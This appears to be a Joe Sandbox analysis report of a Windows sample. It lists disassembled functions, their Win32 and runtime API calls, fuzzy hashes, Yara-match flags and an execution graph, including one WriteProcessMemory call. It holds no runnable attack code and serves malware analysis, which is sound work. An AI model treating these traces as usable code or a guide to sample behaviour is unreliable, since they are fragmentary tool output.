                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: FindHandlersScopeSectionTableValidate
                                                                      • String ID:
                                                                      • API String ID: 876702719-0
                                                                      • Opcode ID: 59bca6904b43cb8a0da12073ac6844af6c5823a4cc2d18639c913939bb52249c
                                                                      • Instruction ID: c457ce0c22936e8e388b1f5d8bf7b4737a529d1c0819c1b1b945d5256e77c8c0
                                                                      • Opcode Fuzzy Hash: 59bca6904b43cb8a0da12073ac6844af6c5823a4cc2d18639c913939bb52249c
                                                                      • Instruction Fuzzy Hash: BE91C3B2A006188BDB28CF59D88076FB7B9FB84351F16412DDA25977E1E731ED42CB90
                                                                      Function 00BFF574 Relevance: 7.7, APIs: 5, Instructions: 170COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,00BFF75E,?,?,?), ref: 00BFF61A
                                                                      • _malloc.LIBCMT ref: 00BFF64F
                                                                        • Part of subcall function 00C022D3: _strlen.LIBCMT ref: 00C02355
                                                                        • Part of subcall function 00C022D3: _memset.LIBCMT ref: 00C023CD
                                                                        • Part of subcall function 00C022D3: MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,00000000,?,?,?,?,?,00BFF75E,?), ref: 00C023E4
                                                                      • _memset.LIBCMT ref: 00BFF66F
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,?,?,?,00000001), ref: 00BFF684
                                                                      • __freea.LIBCMT ref: 00BFF69C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$_memset$__freea_malloc_strlen
                                                                      • String ID:
                                                                      • API String ID: 574822426-0
                                                                      • Opcode ID: c568740b1fbec095d8d7e3e4032d858e710da62e1f5ad2d43351d8b6eeb3139b
                                                                      • Instruction ID: ee542d89585ce4a2c1e47f1bd733bea0b82deeaf2a8cdd7a14591905a3b578e5
                                                                      • Opcode Fuzzy Hash: c568740b1fbec095d8d7e3e4032d858e710da62e1f5ad2d43351d8b6eeb3139b
                                                                      • Instruction Fuzzy Hash: C751377250010FAFDB209FA4DC81ABE7BE9EF14354B1045BAFA04D7160DA71DD68DBA0
                                                                      Function 00C04009 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __CreateFrameInfo.LIBCMT ref: 00C04031
                                                                        • Part of subcall function 00C03921: __getptd.LIBCMT ref: 00C0392F
                                                                        • Part of subcall function 00C03921: __getptd.LIBCMT ref: 00C0393D
                                                                      • __getptd.LIBCMT ref: 00C0403B
                                                                        • Part of subcall function 00BFB7E6: __amsg_exit.LIBCMT ref: 00BFB7F6
                                                                      • __getptd.LIBCMT ref: 00C04049
                                                                      • __getptd.LIBCMT ref: 00C04057
                                                                      • __getptd.LIBCMT ref: 00C04062
                                                                        • Part of subcall function 00C039C6: __CallSettingFrame@12.LIBCMT ref: 00C03A12
                                                                        • Part of subcall function 00C0412F: __getptd.LIBCMT ref: 00C0413E
                                                                        • Part of subcall function 00C0412F: __getptd.LIBCMT ref: 00C0414C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit
                                                                      • String ID:
                                                                      • API String ID: 3174811152-0
                                                                      • Opcode ID: 207eb629d19133c1b58a5250d1da6745d41d4e5ad16821eb7d210aa5e97d8cc6
                                                                      • Instruction ID: c825005b41c106604121e7cee1b8e5517399703964e7ade00920bd4aa3271c68
                                                                      • Opcode Fuzzy Hash: 207eb629d19133c1b58a5250d1da6745d41d4e5ad16821eb7d210aa5e97d8cc6
                                                                      • Instruction Fuzzy Hash: 181107B5C04209DFDB00EFA4C985AAE7BF0FF04310F1080A9F914A7291DB789A55DF51
                                                                      Function 008F8494 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 008F84C3
                                                                      • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,008F8540,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 008F84F7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 008F1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_8f1000_windows10.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InformationLogicalProcessor
                                                                      • String ID: GetLogicalProcessorInformation$kernel32.dll
                                                                      • API String ID: 1773637529-812649623
                                                                      • Opcode ID: 50924ce77512a2b9dafe910b696f906bb0c761ed524ada5e9755cf228c8b0ce0
                                                                      • Instruction ID: facfc26de495bd95f743f6b9e6ff843d37e0a52cc7384122512081d852e66927
                                                                      • Opcode Fuzzy Hash: 50924ce77512a2b9dafe910b696f906bb0c761ed524ada5e9755cf228c8b0ce0
                                                                      • Instruction Fuzzy Hash: E011907190420CEFEB10EBB8DC52B7EB7E8FB48314F254066E714D6181EE359A948626
                                                                      Function 008F8492 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 008F84C3
                                                                      • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,008F8540,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 008F84F7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 008F1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_8f1000_windows10.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InformationLogicalProcessor
                                                                      • String ID: GetLogicalProcessorInformation$kernel32.dll
                                                                      • API String ID: 1773637529-812649623
                                                                      • Opcode ID: eb521f12a6e7dd0da2c0eda1631aa079634bb3e38c97a74df442a745008d3fe7
                                                                      • Instruction ID: 87294933dab529522d583cb354c25481a4c3e069fd1f8a97d09fff900418ef72
                                                                      • Opcode Fuzzy Hash: eb521f12a6e7dd0da2c0eda1631aa079634bb3e38c97a74df442a745008d3fe7
                                                                      • Instruction Fuzzy Hash: C1018070D0460CEFEB10EBB89C42A7EB7E8FB08314F114166F714D6181EE75DA948626
                                                                      Function 008FC860 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetThreadUILanguage.KERNEL32(?,00000000), ref: 008FC871
                                                                      • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 008FC8CF
                                                                      • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 008FC92C
                                                                      • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 008FC95F
                                                                        • Part of subcall function 008FC81C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,008FC8DD), ref: 008FC833
                                                                        • Part of subcall function 008FC81C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,008FC8DD), ref: 008FC850
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 008F1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_8f1000_windows10.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Thread$LanguagesPreferred$Language
                                                                      • String ID:
                                                                      • API String ID: 2255706666-0
                                                                      • Opcode ID: cb636dda3aa5bb8e51ffb7a5071b6d3f1a8ab48cd583134b6a2cb5bda97c5242
                                                                      • Instruction ID: d0f52351635fb46696d556c3066608cab0e73296f065fedb270bd0911e359935
                                                                      • Opcode Fuzzy Hash: cb636dda3aa5bb8e51ffb7a5071b6d3f1a8ab48cd583134b6a2cb5bda97c5242
                                                                      • Instruction Fuzzy Hash: 0D314B70E1021E9BDB10EFF8C995ABEB7B4FF08310F104166E665E7291EB749A04CB91
                                                                      Function 00BFB59A Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(00000000,?,00BFB635), ref: 00BFB5AC
                                                                      • TlsGetValue.KERNEL32(00C0C658,?,00BFB635), ref: 00BFB5C3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID: DecodePointer$KERNEL32.DLL
                                                                      • API String ID: 3702945584-629428536
                                                                      • Opcode ID: e7a94842c9d7c5528deac2b675e3a7968b0b083352d3a6e1defb8d49faad4443
                                                                      • Instruction ID: 5ccb32baef7e9fe3b972cbce610e9f4e842f1bd6de297c805d0ab269bd537e39
                                                                      • Opcode Fuzzy Hash: e7a94842c9d7c5528deac2b675e3a7968b0b083352d3a6e1defb8d49faad4443
                                                                      • Instruction Fuzzy Hash: B501F730644259ABCF21AB79DC55FAB7FD88F113A471802A4FD08C7191DB66CD05C6D0
                                                                      Function 00BFB51F Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 41COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(00000000,?,00BFB598,00000000,00C0273C,00C0F6D0,00000000,00000314,?,00C00261,00C0F6D0,Microsoft Visual C++ Runtime Library,00012010), ref: 00BFB531
                                                                      • TlsGetValue.KERNEL32(00C0C658,?,00BFB598,00000000,00C0273C,00C0F6D0,00000000,00000314,?,00C00261,00C0F6D0,Microsoft Visual C++ Runtime Library,00012010), ref: 00BFB548
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID: EncodePointer$KERNEL32.DLL
                                                                      • API String ID: 3702945584-3682587211
                                                                      • Opcode ID: a810c4792753c6deb14df5e4edf6a4459354d74125e330e8eef1a00f6d24c509
                                                                      • Instruction ID: 65a6916c5b4b2104592b281e787dc2c873c205c377566377263481758560e61d
                                                                      • Opcode Fuzzy Hash: a810c4792753c6deb14df5e4edf6a4459354d74125e330e8eef1a00f6d24c509
                                                                      • Instruction Fuzzy Hash: D2F04F7010021EAACB11AF39DC50EBE3BE9DB153A47150271FE18D75A1DB26DE55C7A0
                                                                      Function 00C03D9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CallFrame@12Setting__getptd
                                                                      • String ID: j
                                                                      • API String ID: 3454690891-2137352139
                                                                      • Opcode ID: c4a67d9dd7f0164245bec01a564f135e69c4739bb5b40795172e5f2408bc0f66
                                                                      • Instruction ID: 7037b4632913d1c1e2a39489908174ac7c13724f396e2b50b2188d1f8de34ec3
                                                                      • Opcode Fuzzy Hash: c4a67d9dd7f0164245bec01a564f135e69c4739bb5b40795172e5f2408bc0f66
                                                                      • Instruction Fuzzy Hash: 6B118B71915295EFCB12DF69C8443ACBFB4BF05718F28868AD4A46F1C3C371AA51DB81
                                                                      Function 00C043B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___BuildCatchObject.LIBCMT ref: 00C043C9
                                                                        • Part of subcall function 00C04324: ___BuildCatchObjectHelper.LIBCMT ref: 00C0435A
                                                                      • _UnwindNestedFrames.LIBCMT ref: 00C043E0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                      • String ID: csm
                                                                      • API String ID: 3487967840-1018135373
                                                                      • Opcode ID: d7cfb688f90cc76fd5960e040264083c7c1c916bb07f4d54eefe1401d8d22a85
                                                                      • Instruction ID: 329674052ad0318cca3962b8e062ed892b52cef03767d5e60c89718dd9c29754
                                                                      • Opcode Fuzzy Hash: d7cfb688f90cc76fd5960e040264083c7c1c916bb07f4d54eefe1401d8d22a85
                                                                      • Instruction Fuzzy Hash: 26012FB5000109BBCF16AF51DC46EAB3EAAFF08341F008010BE18241A1D772AAB1EBA0
                                                                      Function 00C0412F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 00C0413E
                                                                        • Part of subcall function 00BFB7E6: __amsg_exit.LIBCMT ref: 00BFB7F6
                                                                      • __getptd.LIBCMT ref: 00C0414C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: __getptd$__amsg_exit
                                                                      • String ID: csm
                                                                      • API String ID: 1969926928-1018135373
                                                                      • Opcode ID: 9d7e085454ab6c2d7cb152083fa03de183894ad01705aed6babd743c65a25248
                                                                      • Instruction ID: 2b77350bb6112a19d2276a34448421d23509cc5e303c171c1bf95f4dde67a6cc
                                                                      • Opcode Fuzzy Hash: 9d7e085454ab6c2d7cb152083fa03de183894ad01705aed6babd743c65a25248
                                                                      • Instruction Fuzzy Hash: 73016DB68002049FDF389F64D444AAEB7B9AF24311F14446DE160562D2CB70DFE4DF41

                                                                      Execution Graph

                                                                      Execution Coverage:1.4%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:255
                                                                      Total number of Limit Nodes:28
                                                                      execution_graph 77747 da0c48 77750 da0c50 77747->77750 77748 da0cdb 77751 da0d25 77748->77751 77760 da0e9b 77748->77760 77761 d90354 77748->77761 77750->77748 77752 d90354 2 API calls 77750->77752 77753 d90354 2 API calls 77751->77753 77754 da0d6f 77751->77754 77752->77748 77753->77754 77755 d90354 2 API calls 77754->77755 77758 da0db9 77754->77758 77755->77758 77756 da0e45 77757 d90354 2 API calls 77756->77757 77756->77760 77757->77760 77758->77756 77759 d90354 2 API calls 77758->77759 77759->77756 77762 d9036e 77761->77762 77765 d8544c 77762->77765 77763 d903cd 77763->77751 77766 d85460 77765->77766 77772 d84a24 77766->77772 77768 d85486 77769 d8558f 77768->77769 77776 b7e834 77768->77776 77769->77763 77770 d85517 77770->77763 77773 d84a2d 77772->77773 77780 cecae4 77773->77780 77775 d84a43 77775->77768 77777 b7e84a 77776->77777 77792 b7e7a8 77777->77792 77779 b7e89a 77779->77770 77781 cecaf5 77780->77781 77783 cecb79 77781->77783 77784 d8d3ec 77781->77784 77783->77775 77787 d8d1a8 77784->77787 77786 d8d3f9 77786->77783 77788 d8d323 77787->77788 77789 d8d1d8 77787->77789 77788->77786 77789->77788 77790 d8d260 RegOpenKeyExW 77789->77790 77790->77789 77791 d8d273 77790->77791 77791->77786 77793 b7e7c9 77792->77793 77797 b7e80c 77792->77797 77794 b7e7a8 KiUserCallbackDispatcher 77793->77794 77793->77797 77795 b7e7e1 77794->77795 77798 b7d0a0 77795->77798 77797->77779 77799 b7d0b1 77798->77799 77800 b7d11d 77799->77800 77803 b854a4 77799->77803 77800->77797 77804 b854c0 77803->77804 77807 b8ad64 77804->77807 77806 b7d0fc 77806->77797 77808 b8ad9d 77807->77808 77811 ce94b0 77808->77811 77809 b8af5c 77809->77806 77812 ce94ca KiUserCallbackDispatcher 77811->77812 77812->77809 77813 d3cee0 77814 d3cef5 77813->77814 77815 d3cee9 77813->77815 77817 d38164 77815->77817 77818 d3816e 77817->77818 77819 d381e4 77818->77819 77821 afaf3c 77818->77821 77819->77814 77822 afaf69 GetFileVersionInfoSizeW 77821->77822 77824 afaffc 77822->77824 77825 afaf89 GetFileVersionInfoW 77822->77825 77824->77819 77827 afafbc 77825->77827 77827->77819 77828 dd9748 77830 dd99fe 77828->77830 77831 dd9a22 77830->77831 77835 dd9a24 std::bad_alloc::bad_alloc 77830->77835 77838 ddc0b6 77830->77838 77848 ddc18f TlsGetValue TlsGetValue _doexit 77830->77848 77833 dd9a4a 77850 dd99e1 7 API calls std::exception::exception 77833->77850 77835->77833 77849 ddc050 9 API calls __cinit 77835->77849 77837 dd9a54 CallUnexpected 77839 ddc169 77838->77839 77845 ddc0c8 _malloc 77838->77845 77855 ddc18f TlsGetValue TlsGetValue _doexit 77839->77855 77844 ddc125 RtlAllocateHeap 77844->77845 77845->77844 77847 ddc155 _malloc 77845->77847 77851 de029d 4 API calls 2 library calls 77845->77851 77852 de00f2 4 API calls 6 library calls 77845->77852 77853 ddc067 7 API calls 3 library calls 77845->77853 77854 ddc18f TlsGetValue TlsGetValue _doexit 77845->77854 77847->77830 77848->77830 77849->77833 77850->77837 77851->77845 77852->77845 77853->77845 77854->77845 77855->77847 77856 cef118 77859 d86710 77856->77859 77857 cef147 77860 d8672a 77859->77860 77864 d8672f 77859->77864 77862 d86801 77860->77862 77860->77864 77863 cef53c 3 API calls 77862->77863 77865 d86827 77863->77865 77864->77865 77866 cef53c 77864->77866 77865->77857 77867 cef556 77866->77867 77868 cef5f5 77867->77868 77869 cef5b0 77867->77869 77879 cef739 77867->77879 77876 cefa7b 77868->77876 77880 cef5bb 77868->77880 77885 d3d288 GetFileVersionInfoSizeW GetFileVersionInfoW 77868->77885 77870 cef5d9 77869->77870 77871 cef5b5 77869->77871 77872 cef72e 77870->77872 77870->77880 77877 cef9ec 77871->77877 77871->77880 77873 ceacc0 3 API calls 77872->77873 77873->77879 77876->77865 77878 ceacc0 3 API calls 77877->77878 77877->77879 77878->77879 77879->77865 77880->77879 77881 ceacc0 77880->77881 77883 ceacd6 77881->77883 77882 ceaedb 77882->77879 77883->77882 77886 d89c2c 77883->77886 77885->77880 77887 d89c3b 77886->77887 77890 d87b98 77887->77890 77889 d89c4c 77889->77882 77891 d87bbc 77890->77891 77892 d87d31 77891->77892 77894 d87c7d 77891->77894 77893 d87d45 KiUserCallbackDispatcher 77892->77893 77896 d87cca 77892->77896 77893->77896 77894->77896 77897 d3d2a4 GetFileVersionInfoSizeW GetFileVersionInfoW 77894->77897 77896->77889 77897->77896 77662 addc44 77663 addc4c 77662->77663 77664 addc88 77663->77664 77666 adc184 77663->77666 77667 adc1a9 77666->77667 77668 adc193 77666->77668 77667->77664 77668->77667 77670 adc13c 77668->77670 77671 adc14c 77670->77671 77673 adc168 77670->77673 77674 add3b4 77671->77674 77673->77667 77675 add3f5 77674->77675 77678 add290 77675->77678 77677 add42e 77677->77673 77680 add2b1 77678->77680 77679 add32c 77679->77677 77680->77679 77684 adc97c 77680->77684 77682 add348 77682->77679 77683 adc97c 6 API calls 77682->77683 77683->77679 77685 adc99f 77684->77685 77687 adc9a8 77685->77687 77688 adc860 6 API calls 77685->77688 77687->77682 77688->77687 77689 adee44 77690 adee4f 77689->77690 77693 ad9498 77690->77693 77694 ad94a7 77693->77694 77697 ad97dc 77694->77697 77698 ad942c 77694->77698 77699 ad9474 77698->77699 77700 ad943c 77698->77700 77700->77699 77702 dab794 77700->77702 77703 dab7c1 77702->77703 77704 dab7ae 77702->77704 77703->77700 77706 cf92fc 77704->77706 77707 cf9322 GlobalAddAtomW 77706->77707 77709 cf9370 77707->77709 77716 cf9070 77709->77716 77711 cf93d1 77721 d8cb1c 77711->77721 77713 cf93f0 77727 d8e394 77713->77727 77715 cf9410 77715->77703 77717 cf907f SetErrorMode 77716->77717 77718 cf90d0 77716->77718 77719 cf90a3 77717->77719 77720 cf90b2 SetErrorMode 77717->77720 77718->77711 77719->77720 77720->77711 77722 d8cb26 77721->77722 77731 d8cffc 77722->77731 77724 d8cb5f 77735 d8d5d8 77724->77735 77726 d8cc47 77726->77713 77728 d8e3a3 77727->77728 77729 d8e4a7 LoadIconW 77728->77729 77730 d8e4ca 77729->77730 77730->77715 77733 d8d00e 77731->77733 77732 d8d032 LoadCursorW 77732->77733 77733->77732 77734 d8d04f 77733->77734 77734->77724 77736 d8d5f2 77735->77736 77737 d8d66c SystemParametersInfoW 77736->77737 77738 d8d68a 77737->77738 77738->77726 77898 ddaa66 77899 ddaa71 __DllMainCRTStartup@12 77898->77899 77902 dda970 77899->77902 77901 ddaa84 77903 dda97c _realloc 77902->77903 77904 ddaa19 _realloc 77903->77904 77906 dda9c9 77903->77906 77910 dda83b 77903->77910 77904->77901 77906->77904 77907 dda9f9 77906->77907 77909 dda83b ___DllMainCRTStartup 28 API calls 77906->77909 77907->77904 77908 dda83b ___DllMainCRTStartup 28 API calls 77907->77908 77908->77904 77909->77907 77911 dda84a 77910->77911 77912 dda8c6 77910->77912 77955 dde1b4 HeapCreate 77911->77955 77914 dda8fd 77912->77914 77915 dda8cc 77912->77915 77916 dda95b 77914->77916 77917 dda902 77914->77917 77919 dda8e7 77915->77919 77944 dda855 77915->77944 77966 ddd9ff 7 API calls _doexit 77915->77966 77916->77944 77975 ddb92f 10 API calls 2 library calls 77916->77975 77970 ddb615 TlsGetValue TlsGetValue TlsGetValue TlsSetValue _doexit 77917->77970 77919->77944 77967 dddcb0 7 API calls _realloc 77919->77967 77924 dda907 77971 ddd6af 8 API calls __calloc_impl 77924->77971 77927 dda913 77927->77944 77972 ddb59a TlsGetValue TlsGetValue __onexit_nolock 77927->77972 77928 dda865 77958 dde1e4 HeapFree HeapFree 77928->77958 77929 dda8f1 77968 ddb649 8 API calls 2 library calls 77929->77968 77933 dda861 __RTC_Initialize 77933->77928 77959 dde031 7 API calls 2 library calls 77933->77959 77934 dda8f6 77969 dde1e4 HeapFree HeapFree 77934->77969 77935 dda931 77938 dda94f 77935->77938 77939 dda938 77935->77939 77974 ddaa89 7 API calls 2 library calls 77938->77974 77973 ddb686 7 API calls 2 library calls 77939->77973 77940 dda881 77960 ddda5c 8 API calls 3 library calls 77940->77960 77944->77906 77945 dda88b 77946 dda88f 77945->77946 77962 dddf76 16 API calls ___initmbctable 77945->77962 77961 ddb649 8 API calls 2 library calls 77946->77961 77949 dda89b 77950 dda8af 77949->77950 77963 dddcfe 16 API calls 6 library calls 77949->77963 77950->77944 77965 dddcb0 7 API calls _realloc 77950->77965 77953 dda8a4 77953->77950 77964 ddd838 9 API calls 5 library calls 77953->77964 77956 dda850 77955->77956 77956->77944 77957 ddb99d 10 API calls 6 library calls 77956->77957 77957->77933 77958->77944 77959->77940 77960->77945 77961->77928 77962->77949 77963->77953 77964->77950 77965->77946 77966->77919 77967->77929 77968->77934 77969->77944 77970->77924 77971->77927 77972->77935 77974->77944 77975->77944 77739 dcb7b0 77740 dcb7db 77739->77740 77741 dcb805 77739->77741 77740->77741 77742 dcb7e2 WriteProcessMemory 77740->77742 77743 daa114 77744 daa127 77743->77744 77746 daa1b2 77743->77746 77745 daa1a8 GetNativeSystemInfo 77744->77745 77744->77746 77745->77746 77976 cfa110 77977 cfa230 77976->77977 77979 cfa13e 77976->77979 77979->77977 77980 cfa304 77979->77980 77981 cfa32c 77980->77981 77984 cfa26c 77981->77984 77983 cfa337 77983->77977 77987 cf99a4 77984->77987 77986 cfa28f 77986->77983 77988 cf99aa 77987->77988 77991 cf5af0 77988->77991 77990 cf99bf 77990->77986 77992 cf5afa 77991->77992 77993 cecae4 RegOpenKeyExW 77992->77993 77994 cf5b10 77993->77994 77994->77990

                                                                      Executed Functions

                                                                      Function 00CF92FC Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 112COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GlobalAddAtomW.KERNEL32(00000000), ref: 00CF9350
                                                                        • Part of subcall function 00CF9070: SetErrorMode.KERNELBASE(00008000), ref: 00CF9084
                                                                        • Part of subcall function 00CF9070: SetErrorMode.KERNELBASE(?,00CF90D0), ref: 00CF90C3
                                                                        • Part of subcall function 00D8E394: LoadIconW.USER32(00DB4040,MAINICON,?,?,?,00CF9410), ref: 00D8E4BC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000CAD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CAD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_cad000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$AtomGlobalIconLoad
                                                                      • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$DelphiRM_GetObjectInstance$USER32
                                                                      • API String ID: 1953398334-1139167764
                                                                      • Opcode ID: 436daa5087e223eb94259e9fd494686485b6d2001fe1261e8da69bd86f478e1e
                                                                      • Instruction ID: 8df992afad4a268e953f7703b91a98d0ae380de1b0df5a6a184ff2694b778ebb
                                                                      • Opcode Fuzzy Hash: 436daa5087e223eb94259e9fd494686485b6d2001fe1261e8da69bd86f478e1e
                                                                      • Instruction Fuzzy Hash: 82416D74600389DBCB40FFB8ED92AAEB7F4EB18304B404565F615DB361EE349A058B71
                                                                      Function 00DDA83B Relevance: 10.6, APIs: 7, Instructions: 105COMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • __mtterm.LIBCMT ref: 00DDA8F1
                                                                        • Part of subcall function 00DDE1B4: HeapCreate.KERNELBASE(00000000,00000000,00001000,00000000,?,00DDA850,?), ref: 00DDE1CA
                                                                      • __RTC_Initialize.LIBCMT ref: 00DDA86C
                                                                      • __mtterm.LIBCMT ref: 00DDA88F
                                                                        • Part of subcall function 00DDB649: TlsFree.KERNEL32(00DEC65C,00DDA8F6), ref: 00DDB674
                                                                      • __setenvp.LIBCMT ref: 00DDA89F
                                                                      • __cinit.LIBCMT ref: 00DDA8AA
                                                                      • ___set_flsgetvalue.LIBCMT ref: 00DDA902
                                                                        • Part of subcall function 00DDB615: TlsGetValue.KERNEL32(?,00DDB784), ref: 00DDB61E
                                                                        • Part of subcall function 00DDB615: TlsSetValue.KERNEL32(00000000), ref: 00DDB63F
                                                                        • Part of subcall function 00DDD6AF: __calloc_impl.LIBCMT ref: 00DDD6C0
                                                                      • __freeptd.LIBCMT ref: 00DDA961
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: Value__mtterm$CreateFreeHeapInitialize___set_flsgetvalue__calloc_impl__cinit__freeptd__setenvp
                                                                      • String ID:
                                                                      • API String ID: 3186663487-0
                                                                      • Opcode ID: 4ec0c534a04deebaef199423d145f8cbdf7afd2c4b8c55c1e52647b317ebfb2b
                                                                      • Instruction ID: 3c21dbf71f55fb04dcca8272b6dc2504fa9db0117875a89fd971f338e5aa9d33
                                                                      • Opcode Fuzzy Hash: 4ec0c534a04deebaef199423d145f8cbdf7afd2c4b8c55c1e52647b317ebfb2b
                                                                      • Instruction Fuzzy Hash: CE21D131544382D99E2537BDAC1262A3359DF90364B6AC42BFD55C9382EF20C842AA73
                                                                      Function 00DD9748 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
